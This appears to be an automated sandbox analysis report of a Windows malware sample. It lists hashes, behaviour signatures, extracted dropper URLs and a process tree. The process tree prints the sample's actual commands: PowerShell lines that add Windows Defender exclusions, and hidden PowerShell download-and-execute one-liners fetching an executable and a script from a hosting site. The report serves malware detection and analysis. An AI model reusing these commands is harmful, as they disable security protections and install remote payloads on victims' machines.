Overview

overview

10

Static

static

3

ee38e40d13...18.exe

windows7-x64

10

ee38e40d13...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    78s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 18:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe

  • Size

    147KB

  • MD5

    ee38e40d13cfee4d0fb24624c152fb48

  • SHA1

    55d903926d63c0a2db44774d15b137af2b4483be

  • SHA256

    242fd2d6c72a0a3cfe8f767465e30d94d70e2d094277ad3d6be99336af625480

  • SHA512

    8b8d85f2335b2d3b247226583a4f7a717b65cb740c4fbe9fce093b15b23c43da1d1271943d8c48bf567cea806735f91e89928b8cd9f5abbf6d84626e83fbe8f1

  • SSDEEP

    3072:5jFRQGCIIm1xs5GWp1icKAArDZz4N9GhbkrNEk1AgZ:dQGCIImOp0yN90QEE

Score
10/10
discoveryexecutionpersistence

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/dazlle/logos/downloads/svchost.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://bitbucket.org/dazlle/logos/downloads/TASK.ps1

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c test10.bat
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\Temp"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension ".reg"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/dazlle/logos/downloads/svchost.exe','C:\Users\Admin\AppData\Local\Temp\svchost.exe'); cmd /c 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2344
      • C:\wiNDowS\SysWOW64\windowsPowerShell\v1.0\powershell.exe
        C:\wiNDowS\System32\windowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('https://bitbucket.org/dazlle/logos/downloads/TASK.ps1');IEX $wcli
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\test10.bat
    Filesize

    1KB

    MD5

    538dc74b9937f71bf6e20cf5cda70cd4

    SHA1

    258839f75b2eb0978e7566e123557d710d9b264a

    SHA256

    1c8c62d29c1f9f3ed790caa38cc693b6d94a75dac037fc857211028d85942b70

    SHA512

    95d7fd78aa93986c0909e27ead1fc8cfb6a7bccd3f33221f67ae2039966fee6531e3e6dc0d2f795dc46525f279d5d975ee12452e77eb85d52ee20e0b5fa35c23

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    fad196647bc831b8f74510d602689fd3

    SHA1

    a121ad247da28cea5316c307ce5cd4bccb35ad3b

    SHA256

    f6919a4200f4d6640b423326617425c13a1acbd617a18f9747fee7d1a258aa36

    SHA512

    4ee9dc83b3ad822b6c6d2f23beaed4d1a5556027f9612b161f7c1b9ea778aec67110b5e5926a739ee7c9692ddea9c0cd17ccc0dfd524e1e77e5ccef2ebe6c631

    Download Submit